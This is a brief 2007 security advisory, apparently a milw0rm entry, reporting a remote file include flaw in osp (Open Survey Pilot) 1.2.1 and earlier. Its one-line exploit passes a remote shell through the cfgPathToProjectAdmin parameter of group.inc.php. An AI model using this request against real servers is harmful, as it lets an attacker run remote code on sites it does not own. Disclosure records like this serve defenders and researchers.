osp <= 1.2.1 (cfgPathToProjectAdmin) Remote File Include Vulnerablities

2007-04-19T00:00:00
ID SECURITYVULNS:DOC:16784
Type securityvulns
Reporter Securityvulns
Modified 2007-04-19T00:00:00

Description

osp <= 1.2.1 (cfgPathToProjectAdmin) Remote File Include Vulnerablities

D.Script: http://nlcac.internationalstudents.asn.au/osp1.01RC1.tar

        http://sourceforge.net/projects/osp/ &lt;&lt; latest

Discovered by: Alkomandoz Hacker

Homepage: http://www.asb-may.net & TrYaG.CoM & MoHaNdKo.CoM

Exploit:

[Path]/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=Shell


---- Thanx: [KaBaRa.hAcK.eGy] [Mahmood_ali] [3theaby Gheer] [Dr.aSiEr H@Ck] [ AsB-MaY GrOuPs ] [ Cold-Zero ] [ No4Hard ] [ MoHaNdKo ]

---- GreeTz: All www.Asb-May.bet & WwW.MoHaNdKo.CoM & WwW.TrYaG.CoM

milw0rm.com [2007-04-18]